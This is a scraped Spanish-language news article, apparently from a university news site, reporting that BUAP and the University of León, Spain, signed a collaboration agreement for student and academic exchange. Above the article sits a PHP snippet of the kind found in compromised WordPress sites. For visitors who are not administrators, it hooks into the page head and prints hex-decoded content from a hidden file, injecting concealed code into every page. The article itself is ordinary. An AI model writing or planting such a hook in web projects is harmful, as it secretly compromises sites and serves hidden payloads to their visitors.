if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } BUAP y Universidad de León España firmaron convenio de colaboración – La Opinión Universitaria La Opinión Universitaria
Menu

BUAP y Universidad de León España firmaron convenio de colaboración

 

  • Hoy estar en Puebla es gratificante, porque esta universidad la consideramos una de las mejores instituciones no sólo de México sino del mundo: García Marín

Por Diego Cuautle

Como parte de generar intercambio y movilidad entre ambas instituciones, la Benemérita Universidad Autónoma de Puebla (BUAP) y la Universidad de León España firmaron un convenio de colaboración que busca además generar nuevos paradigmas.

Teniendo como sede el Salón Barroco del Edificio Carolino y ante la presencia de integrantes del Conejo Universitario el rector de la Máxima Casa de Estudios del Estado, Alfonso Esparza Ortiz y Juan Francisco García Marín de la universidad española suscribieron el pacto en beneficio de ambas instituciones.

En su oportunidad, García Marín explicó que el convenio se basa en que los estudiantes de ambas universidades podrán realizar intercambios de conocimientos vía virtual e intercambio de estudiantes de países.

“La calidad educativa con la que cuenta la Benemérito Universidad y que es referente en México. Es importante firmar este convenio de colaboración, no solo para realizar intercambio de estudiantes, sino para realizar otro tipo de colaboración”, comentó.

Destacó que hoy estar en Puebla es gratificante, porque esta universidad “la consideramos una de las mejores instituciones no sólo de México sino del mundo, estamos contentos de poder estrechar lazos”.

Finalmente dijo que al estar en este lugar que es imponente como el Edificio Carolino se refuerza la convicción que llevó a colaborar juntos y en la mejora de la calidad educativa de ambas instituciones de educación superior.

En su oportunidad, Esparza Ortiz enfatizó que el convenio genera una ventaja y visión diferente, el intercambio de alumnos tiene que ver con la intervención y una posibilidad de ampliar sus experiencias y adquirir nuevas competencias

«Es indispensable la colaboración entre instituciones educativas y ello incluye la realización de intercambios académicos, pues la riqueza humanística de la universidad permite alcanzar objetivos comunes», agregó.

Destacó las facultades del área de la salud, ingenierías humanidades, sociales, exactas, naturales y en ciencias tecnológicas, existe el interés para que reciban a los alumnos de la máxima casa de estudios.

“Este intercambio de estudiantes genera una visión diferente para los estudiantes, por lo que estamos convencidos que el intercambio de alumnos no solo de licenciaturas, sino de maestrías y posgrados será de crecimiento”, dijo.

  • No comments

    Deja una respuesta

    Tweets recientes